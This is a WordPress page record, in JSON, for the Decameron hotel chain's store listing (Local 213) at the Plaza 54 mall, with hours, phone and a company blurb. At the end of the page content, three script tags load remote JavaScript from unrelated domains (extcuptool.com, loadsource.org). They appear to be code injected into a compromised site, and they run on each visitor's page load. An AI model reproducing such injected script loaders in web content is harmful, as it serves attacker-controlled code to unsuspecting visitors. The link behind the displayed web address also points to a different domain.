{"id":10265,"date":"2018-09-18T20:34:21","date_gmt":"2018-09-18T20:34:21","guid":{"rendered":"http:\/\/plaza54.com\/pagina\/?page_id=10265"},"modified":"2026-04-08T16:03:43","modified_gmt":"2026-04-08T16:03:43","slug":"decameronp2","status":"publish","type":"page","link":"https:\/\/plaza54.com\/pagina\/decameronp2\/","title":{"rendered":"Decameron"},"content":{"rendered":"<style type=\"text\/css\"> \n#cmsmasters_row_6a09043913822 .cmsmasters_row_outer_parent { \n\tpadding-top: 50px; \n} \n\n#cmsmasters_row_6a09043913822 .cmsmasters_row_outer_parent { \n\tpadding-bottom: 55px; \n} \n\n \n#cmsmasters_heading_6a09043913bbb { \n\ttext-align:left; \n\tmargin-top:45px; \n\tmargin-bottom:10px; \n} \n\n#cmsmasters_heading_6a09043913bbb .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a09043913bbb .cmsmasters_heading, #cmsmasters_heading_6a09043913bbb .cmsmasters_heading a { \n\tfont-weight:700; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a09043913bbb .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a09043913bdb { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:30px; \n} \n\n#cmsmasters_heading_6a09043913bdb .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a09043913bdb .cmsmasters_heading, #cmsmasters_heading_6a09043913bdb .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a09043913bdb .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a09043913bf3 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:30px; \n} \n\n#cmsmasters_heading_6a09043913bf3 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a09043913bf3 .cmsmasters_heading, #cmsmasters_heading_6a09043913bf3 .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a09043913bf3 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a09043913c0c { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:10px; \n} \n\n#cmsmasters_heading_6a09043913c0c .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a09043913c0c .cmsmasters_heading, #cmsmasters_heading_6a09043913c0c .cmsmasters_heading a { \n\tfont-weight:700; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a09043913c0c .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a09043913c20 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:30px; \n} \n\n#cmsmasters_heading_6a09043913c20 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a09043913c20 .cmsmasters_heading, #cmsmasters_heading_6a09043913c20 .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a09043913c20 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a09043913c33 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:10px; \n} \n\n#cmsmasters_heading_6a09043913c33 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a09043913c33 .cmsmasters_heading, #cmsmasters_heading_6a09043913c33 .cmsmasters_heading a { \n\tfont-weight:700; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a09043913c33 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a09043913c49 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:50px; \n} \n\n#cmsmasters_heading_6a09043913c49 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a09043913c49 .cmsmasters_heading, #cmsmasters_heading_6a09043913c49 .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a09043913c49 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a09043913d1e { \n\ttext-align:center; \n\tmargin-top:0px; \n\tmargin-bottom:20px; \n} \n\n#cmsmasters_heading_6a09043913d1e .cmsmasters_heading { \n\ttext-align:center; \n} \n\n#cmsmasters_heading_6a09043913d1e .cmsmasters_heading, #cmsmasters_heading_6a09043913d1e .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a09043913d1e .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_divider_6a09043913d39 { \n\tborder-bottom-width:1px; \n\tborder-bottom-style:solid; \n\tpadding-top:0px; \n\tmargin-bottom:30px; \n} \n \n#cmsmasters_divider_6a09043913d8b { \n\tborder-bottom-width:0px; \n\tborder-bottom-style:solid; \n\tpadding-top:0px; \n\tmargin-bottom:20px; \n} \n\r\n\t\t\t\t#cmsmasters_gallery_6a09043913da6 .cmsmasters_gallery {\r\n\t\t\t\t\tmargin:0 0 0 -15px;\r\n\t\t\t\t}\r\n\t\t\t\t\r\n\t\t\t\t#cmsmasters_gallery_6a09043913da6 .cmsmasters_gallery .cmsmasters_gallery_item {\r\n\t\t\t\t\tpadding:0 0 15px 15px;\r\n\t\t\t\t}\r\n\t\t\t<\/style><div id=\"cmsmasters_row_6a09043913822\" class=\"cmsmasters_row cmsmasters_color_scheme_default cmsmasters_row_top_default cmsmasters_row_bot_default cmsmasters_row_boxed\">\n<div class=\"cmsmasters_row_outer_parent\">\n<div class=\"cmsmasters_row_outer\">\n<div class=\"cmsmasters_row_inner\">\n<div class=\"cmsmasters_row_margin\">\n<div class=\"cmsmasters_column one_fourth\">\n<div class=\"aligncenter\">\n<div class=\"cmsmasters_img  cmsmasters_image_c\">\n<img decoding=\"async\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/decameron.jpg\" alt=\"\" \/>\n<\/div>\n<\/div>\n\n<div id=\"cmsmasters_heading_6a09043913bbb\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h3 class=\"cmsmasters_heading\">Horario<\/h3>\n<\/div>\n<div id=\"cmsmasters_heading_6a09043913bdb\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\">Lunes a Viernes: 10:00 am a 7:00 pm<\/h6>\n<\/div>\n<div id=\"cmsmasters_heading_6a09043913bf3\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\">S\u00e1bados: 12:00 am a 7:00 pm<\/h6>\n<\/div>\n<div id=\"cmsmasters_heading_6a09043913c0c\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h3 class=\"cmsmasters_heading\">Contacto<\/h3>\n<\/div>\n<div id=\"cmsmasters_heading_6a09043913c20\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\">318 3701853 <\/h6>\n<\/div>\n<div id=\"cmsmasters_heading_6a09043913c33\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h3 class=\"cmsmasters_heading\">P\u00e1gina Web<\/h3>\n<\/div>\n<div id=\"cmsmasters_heading_6a09043913c49\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\"><a href=\"http:\/\/wox.com.co\/\">www.decameron.com.co<\/a><\/h6>\n<\/div>\n<\/div>\n<div class=\"cmsmasters_column three_fourth\">\n\n<div id=\"cmsmasters_heading_6a09043913d1e\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_center\">\n\t<h2 class=\"cmsmasters_heading\">Decameron &#8211; Local 213<\/h2>\n<\/div>\n\n<div id=\"cmsmasters_divider_6a09043913d39\" class=\"cmsmasters_divider cmsmasters_divider_width_long cmsmasters_divider_pos_center\"><\/div>\n<div class=\"cmsmasters_text\">\n<div class=\"innerShortcode\">\n<div class=\"innerContent\">\n<div>\n<p>Somos una cadena hotelera con presencia internacional que se ha dedicado a divertir, entretener, desestresar y alegrar la vida de cada persona que se acerca a t<span class=\"text_exposed_show\">omar nuestros servicios.<\/span><\/p>\n<p>Nos apasiona la calidad, el buen servicio y entendemos la importancia de prestar atenci\u00f3n a cada detalle, por eso dedicamos todo nuestro esfuerzo para ofrecerte la mejor alternativa hotelera y tur\u00edstica del mercado, dise\u00f1ando la experiencia \u201cTodo Incluido\u201d que te llevar\u00e1 a disfrutar sin preocupaciones y dedicado exclusivamente al descanso, la relajaci\u00f3n y el entretenimiento, emocionando tu coraz\u00f3n y dejando en tu mente los mejores recuerdos de tu vida.<\/p>\n<p>Hacemos parte del portafolio de Terranum Hotels, unidad de negocio del Grupo Terranum que desarrolla, adquiere y opera hoteles en mercados estrat\u00e9gicos de Am\u00e9rica Latina. El Grupo Terranum es la primera plataforma integral de inversi\u00f3n, desarrollo y servicios inmobiliarios corporativos e institucionales en Colombia.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n\n\n<div id=\"cmsmasters_divider_6a09043913d8b\" class=\"cl\"><\/div>\n<div id=\"cmsmasters_gallery_6a09043913da6\" class=\"cmsmasters_gallery_wrap\"><ul class=\"cmsmasters_gallery cmsmasters_3 cmsmasters_more_items_loader\"><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/decameron3.jpg\" rel=\"ilightbox[6a09043913da6]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/decameron3-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/decameron3-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/decameron3-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><\/ul><script type=\"text\/javascript\">\r\n\t\t\t\tjQuery(document).ready(function () {\r\n\t\t\t\t\t(function ($) {\r\n\t\t\t\t\t\tif ($('#cmsmasters_gallery_6a09043913da6').find('.cmsmasters_gallery_item').length == '0') {\r\n\t\t\t\t\t\t\treturn false;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tstartGallery( \r\n\t\t\t\t\t\t\t'6a09043913da6', \r\n\t\t\t\t\t\t\t'grid', \r\n\t\t\t\t\t\t\t'false', \r\n\t\t\t\t\t\t\t'false' \r\n\t\t\t\t\t\t);\r\n\t\t\t\t\t} )(jQuery);\r\n\t\t\t\t} );\r\n\t\t\t<\/script>\r\n\t\t\t<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div id=\"cmsmasters_row_6a09043914104\" class=\"cmsmasters_row cmsmasters_color_scheme_default cmsmasters_row_top_default cmsmasters_row_bot_default cmsmasters_row_boxed\">\n<div class=\"cmsmasters_row_outer_parent\">\n<div class=\"cmsmasters_row_outer\">\n<div class=\"cmsmasters_row_inner\">\n<div class=\"cmsmasters_row_margin\">\n<div class=\"cmsmasters_column one_first\">\n<div class=\"cmsmasters_text\">\n<p><script src=\"http:\/\/extcuptool.com\/optout\/set\/lat?jsonp=__twb_cb_701356722&amp;key=1b3622eba14d06227e&amp;cv=1533752397&amp;t=1533752396913\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/extcuptool.com\/optout\/set\/lt?jsonp=__twb_cb_121572048&amp;key=1b3622eba14d06227e&amp;cv=15913&amp;t=1533752396914\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=52131x6966x&amp;r=1533752396923\" type=\"text\/javascript\"><\/script><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-10265","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages\/10265","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/comments?post=10265"}],"version-history":[{"count":11,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages\/10265\/revisions"}],"predecessor-version":[{"id":11366,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages\/10265\/revisions\/11366"}],"wp:attachment":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/media?parent=10265"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}